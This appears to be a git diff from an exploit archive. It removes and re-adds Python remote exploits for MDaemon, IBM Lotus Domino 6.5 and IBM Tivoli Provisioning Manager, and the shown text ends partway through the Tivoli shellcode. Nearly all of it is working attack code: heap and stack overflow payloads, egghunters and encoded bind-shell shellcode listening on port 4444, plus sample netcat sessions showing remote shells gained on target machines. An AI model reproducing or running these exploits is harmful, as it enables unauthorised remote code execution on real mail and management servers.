+print "[+] Try connecting to port 4444 on victim IP - Muhahaha!\n" + +# milw0rm.com [2005-12-19] diff --git a/platforms/windows/remote/2258.py b/platforms/windows/remote/2258.py index 5aecf307a..36f42d8c5 100755 --- a/platforms/windows/remote/2258.py +++ b/platforms/windows/remote/2258.py @@ -1,152 +1,152 @@ -#!/usr/bin/python -import sys -import struct -import socket -from time import sleep -######################################################################################## -# MDaemon Pre Authentication (USER) Heap Overflow -# Code based on Leon Juranic's exploit -# Coded by muts - mati@see-security.com -# http://www.hackingdefined.com -# http://www.remote-exploit.org -# Tested on: -# Mdaemon 9.0.5 -# Mdaemon 7.2.3 -# Mdaemon 7.2.2 -# Mdaemon 7.2.1 -# Mdaemon 7.2.0 -# Possibly Others -# PLEASE CONTINUE READING ! -# Huge greets to xbxice and talz for leading me away from the darkness -######################################################################################## -# Mdaemon is wierd. It seems like their developers decided to annoy everyone -# by making their software do unexpected things. -# The exploit overwrites UnhandledExceptionFilter, and jumps to an egghunter -# shellcode - which then scans the memory, and executes a bindshell on port 4444. -# -# On some Win2k SP4 machines, I found SetUnhandledExceptionFilter at 0x00000214, -# for which I unfortunately had no explenation. -# I later found out that these machines were fully patched ... -# After inspecting kernel32.dll from my SP4 (not fully patched) and comparing it to -# todays' version, I noticed that the SetunhandledExceptionFilter function had changed, -# and looks suspiciously similar to XP SP2... -# Note that my unpatched win2k was last patched 2-3 weeks ago, -# so I suspect this change is recent. -# The end of easy UnhandledExceptionFilter exploitation on Win2k ? -# -# So, this is a partially working exploit, on unpatched win2k boxes.... -# Kiddies, treat this exploit as DOS :) -# -# I got 3 types of results with this code: -# -# 1. Shell :) -# 2. Mdaemon process shoots up to 100%, scanning memory for shellcode that isn't there. -# 3. Plain ugly crash - oh well. -# -# At minimum, I'de check the UnhandledExceptionFilter address before running the exploit. -######################################################################################## -# -# C:\Documents and Settings\muts>nc -v 192.168.220.128 4444 -# 97DACBEC7CA4483 [192.168.220.128] 4444 (?) open -# Microsoft Windows 2000 [Version 5.00.2195] -# (C) Copyright 1985-2000 Microsoft Corp. -# -# C:\MDaemon\APP> -######################################################################################## - -host="192.168.220.128" - -ret = struct.pack("nc -v 192.168.220.128 4444 +# 97DACBEC7CA4483 [192.168.220.128] 4444 (?) open +# Microsoft Windows 2000 [Version 5.00.2195] +# (C) Copyright 1985-2000 Microsoft Corp. +# +# C:\MDaemon\APP> +######################################################################################## + +host="192.168.220.128" + +ret = struct.pack(" - - -import sys -import md5 -import struct -import base64 -import socket - -def sendbind(target): - bindshell ="\x90"* 400 # Metasploit bind shell port 4444 - bindshell +="\x54\x30\x30\x57\x54\x30\x30\x57" - bindshell +=("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" - "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" - "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" - "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" - "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e" - "\x4f\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58" - "\x4e\x56\x46\x32\x46\x32\x4b\x38\x45\x44\x4e\x43\x4b\x58\x4e\x47" - "\x45\x50\x4a\x57\x41\x50\x4f\x4e\x4b\x38\x4f\x34\x4a\x41\x4b\x58" - "\x4f\x55\x42\x52\x41\x30\x4b\x4e\x43\x4e\x42\x53\x49\x54\x4b\x38" - "\x46\x53\x4b\x58\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a" - "\x46\x58\x42\x4c\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30" - "\x44\x4c\x4b\x4e\x46\x4f\x4b\x33\x46\x55\x46\x42\x4a\x42\x45\x57" - "\x43\x4e\x4b\x58\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x58" - "\x4e\x50\x4b\x34\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x43\x30" - "\x4e\x52\x4b\x48\x49\x38\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c" - "\x41\x43\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x33\x4b\x58\x42\x44" - "\x4e\x50\x4b\x38\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x42\x54\x4a\x50" - "\x50\x35\x4a\x46\x50\x58\x50\x44\x50\x50\x4e\x4e\x42\x35\x4f\x4f" - "\x48\x4d\x41\x53\x4b\x4d\x48\x36\x43\x55\x48\x56\x4a\x36\x43\x33" - "\x44\x33\x4a\x56\x47\x47\x43\x47\x44\x33\x4f\x55\x46\x55\x4f\x4f" - "\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e\x4e\x4f\x4b\x53\x42\x45\x4f\x4f" - "\x48\x4d\x4f\x35\x49\x48\x45\x4e\x48\x56\x41\x48\x4d\x4e\x4a\x50" - "\x44\x30\x45\x55\x4c\x46\x44\x50\x4f\x4f\x42\x4d\x4a\x36\x49\x4d" - "\x49\x50\x45\x4f\x4d\x4a\x47\x55\x4f\x4f\x48\x4d\x43\x45\x43\x45" - "\x43\x55\x43\x55\x43\x45\x43\x34\x43\x45\x43\x34\x43\x35\x4f\x4f" - "\x42\x4d\x48\x56\x4a\x56\x41\x41\x4e\x35\x48\x36\x43\x35\x49\x38" - "\x41\x4e\x45\x49\x4a\x46\x46\x4a\x4c\x51\x42\x57\x47\x4c\x47\x55" - "\x4f\x4f\x48\x4d\x4c\x36\x42\x31\x41\x45\x45\x35\x4f\x4f\x42\x4d" - "\x4a\x36\x46\x4a\x4d\x4a\x50\x42\x49\x4e\x47\x55\x4f\x4f\x48\x4d" - "\x43\x35\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x45\x4e\x49\x44\x48\x38" - "\x49\x54\x47\x55\x4f\x4f\x48\x4d\x42\x55\x46\x35\x46\x45\x45\x35" - "\x4f\x4f\x42\x4d\x43\x49\x4a\x56\x47\x4e\x49\x37\x48\x4c\x49\x37" - "\x47\x45\x4f\x4f\x48\x4d\x45\x55\x4f\x4f\x42\x4d\x48\x36\x4c\x56" - "\x46\x46\x48\x36\x4a\x46\x43\x56\x4d\x56\x49\x38\x45\x4e\x4c\x56" - "\x42\x55\x49\x55\x49\x52\x4e\x4c\x49\x48\x47\x4e\x4c\x36\x46\x54" - "\x49\x58\x44\x4e\x41\x43\x42\x4c\x43\x4f\x4c\x4a\x50\x4f\x44\x54" - "\x4d\x32\x50\x4f\x44\x54\x4e\x52\x43\x49\x4d\x58\x4c\x47\x4a\x53" - "\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46\x44\x57\x50\x4f\x43\x4b\x48\x51" - "\x4f\x4f\x45\x57\x46\x54\x4f\x4f\x48\x4d\x4b\x45\x47\x35\x44\x35" - "\x41\x35\x41\x55\x41\x35\x4c\x46\x41\x50\x41\x35\x41\x45\x45\x35" - "\x41\x45\x4f\x4f\x42\x4d\x4a\x56\x4d\x4a\x49\x4d\x45\x30\x50\x4c" - "\x43\x35\x4f\x4f\x48\x4d\x4c\x56\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f" - "\x42\x4d\x4b\x58\x47\x45\x4e\x4f\x43\x38\x46\x4c\x46\x36\x4f\x4f" - "\x48\x4d\x44\x55\x4f\x4f\x42\x4d\x4a\x36\x4f\x4e\x50\x4c\x42\x4e" - "\x42\x36\x43\x55\x4f\x4f\x48\x4d\x4f\x4f\x42\x4d\x5a") - - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - sock.connect((target, 143)) - response = sock.recv(1024) - bind = 'a001 admin ' + bindshell +'\r\n' - print "[*] Sending bindshell *somewhere* into memory" - sock.send(bind) - response = sock.recv(1024) - sock.close() - -def ExploitLotus(target): - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - sock.connect((target, 143)) - response = sock.recv(1024) - print response - auth = 'a001 authenticate cram-md5\r\n' - sock.send(auth) - response = sock.recv(1024) - print response - m = md5.new() - m.update(response[2:0]) - digest = m.digest() - payload = "\x90" * 12 + "\x33\xd2\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" + 'A' * 210 - - # 0x774b4c6a CALL [EAX +4] - - payload += "jLKw" - payload += "\x90\x90\x90\x83\xE8\x52\x83\xE8\x52\x83\xE8\x52\xFF\xE0" - login = payload + ' ' + digest - login = base64.encodestring(login) + '\r\n' - print "[*] Triggering overwrite, ph33r." - sock.send(login) - sock.close() - print "[*] You may need to wait up to 2 minutes" - print "[*] for egghunter to find da shell." - -if __name__=="__main__": - try: - target = sys.argv[1] - except IndexError: - print '[*] IBM Lotus Domino Server 6.5 Remote Exploit \n[*] muts {-at-} offensive-security.com\r\n' - print '[*] Usage: %s \n' % sys.argv[0] - - sys.exit(-1) - - print '[*] IBM Lotus Domino Server 6.5 Remote Exploit \n[*] muts {-at-} offensive-security.com\r\n' - sendbind(target) - sendbind(target) - sendbind(target) - sendbind(target) - ExploitLotus(target) - -# milw0rm.com [2007-03-31] +#!/usr/bin/python +# +# IBM Lotus Domino Server 6.5 PRE AUTH Remote Exploit +# Tested on windows 2003 server SP0. +# Coded by Mati Aharoni +# muts@offensive-security.com +# http://www.offensive-security.com +# Notes: +# * Not the the faint of heart. +# * Iris, I love you +# Skeleton exploit shamelessly ripped off Winny Thomas +# +# bt ~ # ./domino 192.168.0.38 +# [*] IBM Lotus Domino Server 6.5 Remote Exploit +# [*] muts {-at-} offensive-security.com +# +# [*] Sending bindshell *somewhere* into memory +# [*] Sending bindshell *somewhere* into memory +# [*] Sending bindshell *somewhere* into memory +# [*] Sending bindshell *somewhere* into memory +# * OK Domino IMAP4 Server Release 6.5 ready Sat, 31 Mar 2007 01:45:32 -0800 +# +# + PDAwMzU5QjhGLjg4MjU3MkFGLjAwMDAwQkMwLjAwMDAwMDA4QFRFU1QuQ09NPg== +# +# [*] Triggering overwrite, ph33r. +# [*] You may need to wait up to 2 minutes +# [*] for egghunter to find da shell. +# bt ~ # date +# Sat Mar 31 11:47:07 GMT 2007 +# bt ~ # nc -v 192.168.0.38 4444 +# 192.168.0.38: inverse host lookup failed: Unknown host +# (UNKNOWN) [192.168.0.38] 4444 (krb524) open +# Microsoft Windows [Version 5.2.3790] +# (C) Copyright 1985-2003 Microsoft Corp. +# +#C:\Lotus\Domino> + + +import sys +import md5 +import struct +import base64 +import socket + +def sendbind(target): + bindshell ="\x90"* 400 # Metasploit bind shell port 4444 + bindshell +="\x54\x30\x30\x57\x54\x30\x30\x57" + bindshell +=("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" + "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" + "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" + "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" + "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e" + "\x4f\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58" + "\x4e\x56\x46\x32\x46\x32\x4b\x38\x45\x44\x4e\x43\x4b\x58\x4e\x47" + "\x45\x50\x4a\x57\x41\x50\x4f\x4e\x4b\x38\x4f\x34\x4a\x41\x4b\x58" + "\x4f\x55\x42\x52\x41\x30\x4b\x4e\x43\x4e\x42\x53\x49\x54\x4b\x38" + "\x46\x53\x4b\x58\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a" + "\x46\x58\x42\x4c\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30" + "\x44\x4c\x4b\x4e\x46\x4f\x4b\x33\x46\x55\x46\x42\x4a\x42\x45\x57" + "\x43\x4e\x4b\x58\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x58" + "\x4e\x50\x4b\x34\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x43\x30" + "\x4e\x52\x4b\x48\x49\x38\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c" + "\x41\x43\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x33\x4b\x58\x42\x44" + "\x4e\x50\x4b\x38\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x42\x54\x4a\x50" + "\x50\x35\x4a\x46\x50\x58\x50\x44\x50\x50\x4e\x4e\x42\x35\x4f\x4f" + "\x48\x4d\x41\x53\x4b\x4d\x48\x36\x43\x55\x48\x56\x4a\x36\x43\x33" + "\x44\x33\x4a\x56\x47\x47\x43\x47\x44\x33\x4f\x55\x46\x55\x4f\x4f" + "\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e\x4e\x4f\x4b\x53\x42\x45\x4f\x4f" + "\x48\x4d\x4f\x35\x49\x48\x45\x4e\x48\x56\x41\x48\x4d\x4e\x4a\x50" + "\x44\x30\x45\x55\x4c\x46\x44\x50\x4f\x4f\x42\x4d\x4a\x36\x49\x4d" + "\x49\x50\x45\x4f\x4d\x4a\x47\x55\x4f\x4f\x48\x4d\x43\x45\x43\x45" + "\x43\x55\x43\x55\x43\x45\x43\x34\x43\x45\x43\x34\x43\x35\x4f\x4f" + "\x42\x4d\x48\x56\x4a\x56\x41\x41\x4e\x35\x48\x36\x43\x35\x49\x38" + "\x41\x4e\x45\x49\x4a\x46\x46\x4a\x4c\x51\x42\x57\x47\x4c\x47\x55" + "\x4f\x4f\x48\x4d\x4c\x36\x42\x31\x41\x45\x45\x35\x4f\x4f\x42\x4d" + "\x4a\x36\x46\x4a\x4d\x4a\x50\x42\x49\x4e\x47\x55\x4f\x4f\x48\x4d" + "\x43\x35\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x45\x4e\x49\x44\x48\x38" + "\x49\x54\x47\x55\x4f\x4f\x48\x4d\x42\x55\x46\x35\x46\x45\x45\x35" + "\x4f\x4f\x42\x4d\x43\x49\x4a\x56\x47\x4e\x49\x37\x48\x4c\x49\x37" + "\x47\x45\x4f\x4f\x48\x4d\x45\x55\x4f\x4f\x42\x4d\x48\x36\x4c\x56" + "\x46\x46\x48\x36\x4a\x46\x43\x56\x4d\x56\x49\x38\x45\x4e\x4c\x56" + "\x42\x55\x49\x55\x49\x52\x4e\x4c\x49\x48\x47\x4e\x4c\x36\x46\x54" + "\x49\x58\x44\x4e\x41\x43\x42\x4c\x43\x4f\x4c\x4a\x50\x4f\x44\x54" + "\x4d\x32\x50\x4f\x44\x54\x4e\x52\x43\x49\x4d\x58\x4c\x47\x4a\x53" + "\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46\x44\x57\x50\x4f\x43\x4b\x48\x51" + "\x4f\x4f\x45\x57\x46\x54\x4f\x4f\x48\x4d\x4b\x45\x47\x35\x44\x35" + "\x41\x35\x41\x55\x41\x35\x4c\x46\x41\x50\x41\x35\x41\x45\x45\x35" + "\x41\x45\x4f\x4f\x42\x4d\x4a\x56\x4d\x4a\x49\x4d\x45\x30\x50\x4c" + "\x43\x35\x4f\x4f\x48\x4d\x4c\x56\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f" + "\x42\x4d\x4b\x58\x47\x45\x4e\x4f\x43\x38\x46\x4c\x46\x36\x4f\x4f" + "\x48\x4d\x44\x55\x4f\x4f\x42\x4d\x4a\x36\x4f\x4e\x50\x4c\x42\x4e" + "\x42\x36\x43\x55\x4f\x4f\x48\x4d\x4f\x4f\x42\x4d\x5a") + + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.connect((target, 143)) + response = sock.recv(1024) + bind = 'a001 admin ' + bindshell +'\r\n' + print "[*] Sending bindshell *somewhere* into memory" + sock.send(bind) + response = sock.recv(1024) + sock.close() + +def ExploitLotus(target): + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.connect((target, 143)) + response = sock.recv(1024) + print response + auth = 'a001 authenticate cram-md5\r\n' + sock.send(auth) + response = sock.recv(1024) + print response + m = md5.new() + m.update(response[2:0]) + digest = m.digest() + payload = "\x90" * 12 + "\x33\xd2\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" + 'A' * 210 + + # 0x774b4c6a CALL [EAX +4] + + payload += "jLKw" + payload += "\x90\x90\x90\x83\xE8\x52\x83\xE8\x52\x83\xE8\x52\xFF\xE0" + login = payload + ' ' + digest + login = base64.encodestring(login) + '\r\n' + print "[*] Triggering overwrite, ph33r." + sock.send(login) + sock.close() + print "[*] You may need to wait up to 2 minutes" + print "[*] for egghunter to find da shell." + +if __name__=="__main__": + try: + target = sys.argv[1] + except IndexError: + print '[*] IBM Lotus Domino Server 6.5 Remote Exploit \n[*] muts {-at-} offensive-security.com\r\n' + print '[*] Usage: %s \n' % sys.argv[0] + + sys.exit(-1) + + print '[*] IBM Lotus Domino Server 6.5 Remote Exploit \n[*] muts {-at-} offensive-security.com\r\n' + sendbind(target) + sendbind(target) + sendbind(target) + sendbind(target) + ExploitLotus(target) + +# milw0rm.com [2007-03-31] diff --git a/platforms/windows/remote/4027.py b/platforms/windows/remote/4027.py index a995ffdc9..9bd571d6c 100755 --- a/platforms/windows/remote/4027.py +++ b/platforms/windows/remote/4027.py @@ -1,107 +1,107 @@ -#!/usr/bin/python -# -# IBM Tivoli Provisioning Manager PRE AUTH Remote Exploit -# http://dvlabs.tippingpoint.com/advisory/TPTI-07-05 -# Tested on windows 2003 server SP0. -# Coded by Mati Aharoni -# muts@offensive-security.com -# http://www.offensive-security.com/0day/ibm-ti-pro.py -# Notes: -# * Egghunter can take upto 5 minutes to find the shell. -# -# bt ~ # ./ibm-ti-pro.py 192.168.9.32 -# [*] IBM Tivoli Provisioning Manager PRE AUTH Remote Exploit. -# [*] http://dvlabs.tippingpoint.com/advisory/TPTI-07-05 -# [*] muts@offensive-security.com -# -# [*] Sending evil payload to 192.168.9.32:8080 -# [*] Payload sent, egghunter can take upto 5 minutes to find the shell -# [*] Happy Hunting! -# -# bt ~ # nc -nv 192.168.9.32 4444 -# WIN2K3STD.LOCAL [192.168.9.32] 4444 (krb524) open -# Microsoft Windows [Version 5.2.3790] -# (C) Copyright 1985-2003 Microsoft Corp. -# -# C:\WINDOWS\system32> - -import socket -import os -import sys - -def banner(): - print "\n[*] IBM Tivoli Provisioning Manager PRE AUTH Remote Exploit." - print "[*] http://dvlabs.tippingpoint.com/advisory/TPTI-07-05" - print "[*] muts@offensive-security.com" - -if len(sys.argv)!=2: - banner() - print "[*] Usage: ibm-ti-pro.py \n" - sys.exit(0) - -#77E0211B FFD4 CALL ESP Win2k SP0 -banner() -expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) -expl.connect ( ( sys.argv[1], 8080 ) ) - -# Payload #1 -sc = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74" -"\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7") - -# Payload #2 -# win32_bind - LPORT=4444 Encoder=PexAlphaNum http://metasploit.com - -bindshell =("\x54\x30\x30\x57\x54\x30\x30\x57" -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" -"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" -"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" -"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" -"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e" -"\x4f\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58" -"\x4e\x56\x46\x32\x46\x32\x4b\x38\x45\x44\x4e\x43\x4b\x58\x4e\x47" -"\x45\x50\x4a\x57\x41\x50\x4f\x4e\x4b\x38\x4f\x34\x4a\x41\x4b\x58" -"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x43\x4e\x42\x53\x49\x54\x4b\x38" -"\x46\x53\x4b\x58\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a" -"\x46\x58\x42\x4c\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30" -"\x44\x4c\x4b\x4e\x46\x4f\x4b\x33\x46\x55\x46\x42\x4a\x42\x45\x57" -"\x43\x4e\x4b\x58\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x58" -"\x4e\x50\x4b\x34\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x43\x30" -"\x4e\x52\x4b\x48\x49\x38\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c" -"\x41\x43\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x33\x4b\x58\x42\x44" -"\x4e\x50\x4b\x38\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x42\x54\x4a\x50" -"\x50\x35\x4a\x46\x50\x58\x50\x44\x50\x50\x4e\x4e\x42\x35\x4f\x4f" -"\x48\x4d\x41\x53\x4b\x4d\x48\x36\x43\x55\x48\x56\x4a\x36\x43\x33" -"\x44\x33\x4a\x56\x47\x47\x43\x47\x44\x33\x4f\x55\x46\x55\x4f\x4f" -"\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e\x4e\x4f\x4b\x53\x42\x45\x4f\x4f" -"\x48\x4d\x4f\x35\x49\x48\x45\x4e\x48\x56\x41\x48\x4d\x4e\x4a\x50" -"\x44\x30\x45\x55\x4c\x46\x44\x50\x4f\x4f\x42\x4d\x4a\x36\x49\x4d" -"\x49\x50\x45\x4f\x4d\x4a\x47\x55\x4f\x4f\x48\x4d\x43\x45\x43\x45" -"\x43\x55\x43\x55\x43\x45\x43\x34\x43\x45\x43\x34\x43\x35\x4f\x4f" -"\x42\x4d\x48\x56\x4a\x56\x41\x41\x4e\x35\x48\x36\x43\x35\x49\x38" -"\x41\x4e\x45\x49\x4a\x46\x46\x4a\x4c\x51\x42\x57\x47\x4c\x47\x55" -"\x4f\x4f\x48\x4d\x4c\x36\x42\x31\x41\x45\x45\x35\x4f\x4f\x42\x4d" -"\x4a\x36\x46\x4a\x4d\x4a\x50\x42\x49\x4e\x47\x55\x4f\x4f\x48\x4d" -"\x43\x35\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x45\x4e\x49\x44\x48\x38" -"\x49\x54\x47\x55\x4f\x4f\x48\x4d\x42\x55\x46\x35\x46\x45\x45\x35" -"\x4f\x4f\x42\x4d\x43\x49\x4a\x56\x47\x4e\x49\x37\x48\x4c\x49\x37" -"\x47\x45\x4f\x4f\x48\x4d\x45\x55\x4f\x4f\x42\x4d\x48\x36\x4c\x56" -"\x46\x46\x48\x36\x4a\x46\x43\x56\x4d\x56\x49\x38\x45\x4e\x4c\x56" -"\x42\x55\x49\x55\x49\x52\x4e\x4c\x49\x48\x47\x4e\x4c\x36\x46\x54" -"\x49\x58\x44\x4e\x41\x43\x42\x4c\x43\x4f\x4c\x4a\x50\x4f\x44\x54" -"\x4d\x32\x50\x4f\x44\x54\x4e\x52\x43\x49\x4d\x58\x4c\x47\x4a\x53" -"\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46\x44\x57\x50\x4f\x43\x4b\x48\x51" -"\x4f\x4f\x45\x57\x46\x54\x4f\x4f\x48\x4d\x4b\x45\x47\x35\x44\x35" -"\x41\x35\x41\x55\x41\x35\x4c\x46\x41\x50\x41\x35\x41\x45\x45\x35" -"\x41\x45\x4f\x4f\x42\x4d\x4a\x56\x4d\x4a\x49\x4d\x45\x30\x50\x4c" -"\x43\x35\x4f\x4f\x48\x4d\x4c\x56\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f" -"\x42\x4d\x4b\x58\x47\x45\x4e\x4f\x43\x38\x46\x4c\x46\x36\x4f\x4f" -"\x48\x4d\x44\x55\x4f\x4f\x42\x4d\x4a\x36\x4f\x4e\x50\x4c\x42\x4e" -"\x42\x36\x43\x55\x4f\x4f\x48\x4d\x4f\x4f\x42\x4d\x5a") - -print "[*] Sending evil payload to "+sys.argv[1] +":8080" -expl.send ( 'GET /' + '\x41'*131 +bindshell+'\x1b\x21\xe0\x77'+'\x90'*8 +sc +'\xcc'*500+'.exe HTTP/1.0\r\n\r\n\r\n') -print "[*] Payload sent, egghunter can take upto 5 minutes to find the shell" -print "[*] Happy Hunting!" -expl.close() - -# milw0rm.com [2007-06-03] +#!/usr/bin/python +# +# IBM Tivoli Provisioning Manager PRE AUTH Remote Exploit +# http://dvlabs.tippingpoint.com/advisory/TPTI-07-05 +# Tested on windows 2003 server SP0. +# Coded by Mati Aharoni +# muts@offensive-security.com +# http://www.offensive-security.com/0day/ibm-ti-pro.py +# Notes: +# * Egghunter can take upto 5 minutes to find the shell. +# +# bt ~ # ./ibm-ti-pro.py 192.168.9.32 +# [*] IBM Tivoli Provisioning Manager PRE AUTH Remote Exploit. +# [*] http://dvlabs.tippingpoint.com/advisory/TPTI-07-05 +# [*] muts@offensive-security.com +# +# [*] Sending evil payload to 192.168.9.32:8080 +# [*] Payload sent, egghunter can take upto 5 minutes to find the shell +# [*] Happy Hunting! +# +# bt ~ # nc -nv 192.168.9.32 4444 +# WIN2K3STD.LOCAL [192.168.9.32] 4444 (krb524) open +# Microsoft Windows [Version 5.2.3790] +# (C) Copyright 1985-2003 Microsoft Corp. +# +# C:\WINDOWS\system32> + +import socket +import os +import sys + +def banner(): + print "\n[*] IBM Tivoli Provisioning Manager PRE AUTH Remote Exploit." + print "[*] http://dvlabs.tippingpoint.com/advisory/TPTI-07-05" + print "[*] muts@offensive-security.com" + +if len(sys.argv)!=2: + banner() + print "[*] Usage: ibm-ti-pro.py \n" + sys.exit(0) + +#77E0211B FFD4 CALL ESP Win2k SP0 +banner() +expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) +expl.connect ( ( sys.argv[1], 8080 ) ) + +# Payload #1 +sc = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74" +"\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7") + +# Payload #2 +# win32_bind - LPORT=4444 Encoder=PexAlphaNum http://metasploit.com + +bindshell =("\x54\x30\x30\x57\x54\x30\x30\x57" +"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" +"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" +"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" +"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" +"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e" +"\x4f\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58" +"\x4e\x56\x46\x32\x46\x32\x4b\x38\x45\x44\x4e\x43\x4b\x58\x4e\x47" +"\x45\x50\x4a\x57\x41\x50\x4f\x4e\x4b\x38\x4f\x34\x4a\x41\x4b\x58" +"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x43\x4e\x42\x53\x49\x54\x4b\x38" +"\x46\x53\x4b\x58\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a" +"\x46\x58\x42\x4c\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30" +"\x44\x4c\x4b\x4e\x46\x4f\x4b\x33\x46\x55\x46\x42\x4a\x42\x45\x57" +"\x43\x4e\x4b\x58\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x58" +"\x4e\x50\x4b\x34\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x43\x30" +"\x4e\x52\x4b\x48\x49\x38\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c" +"\x41\x43\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x33\x4b\x58\x42\x44" +"\x4e\x50\x4b\x38\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x42\x54\x4a\x50" +"\x50\x35\x4a\x46\x50\x58\x50\x44\x50\x50\x4e\x4e\x42\x35\x4f\x4f" +"\x48\x4d\x41\x53\x4b\x4d\x48\x36\x43\x55\x48\x56\x4a\x36\x43\x33" +"\x44\x33\x4a\x56\x47\x47\x43\x47\x44\x33\x4f\x55\x46\x55\x4f\x4f" +"\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e\x4e\x4f\x4b\x53\x42\x45\x4f\x4f" +"\x48\x4d\x4f\x35\x49\x48\x45\x4e\x48\x56\x41\x48\x4d\x4e\x4a\x50" +"\x44\x30\x45\x55\x4c\x46\x44\x50\x4f\x4f\x42\x4d\x4a\x36\x49\x4d" +"\x49\x50\x45\x4f\x4d\x4a\x47\x55\x4f\x4f\x48\x4d\x43\x45\x43\x45" 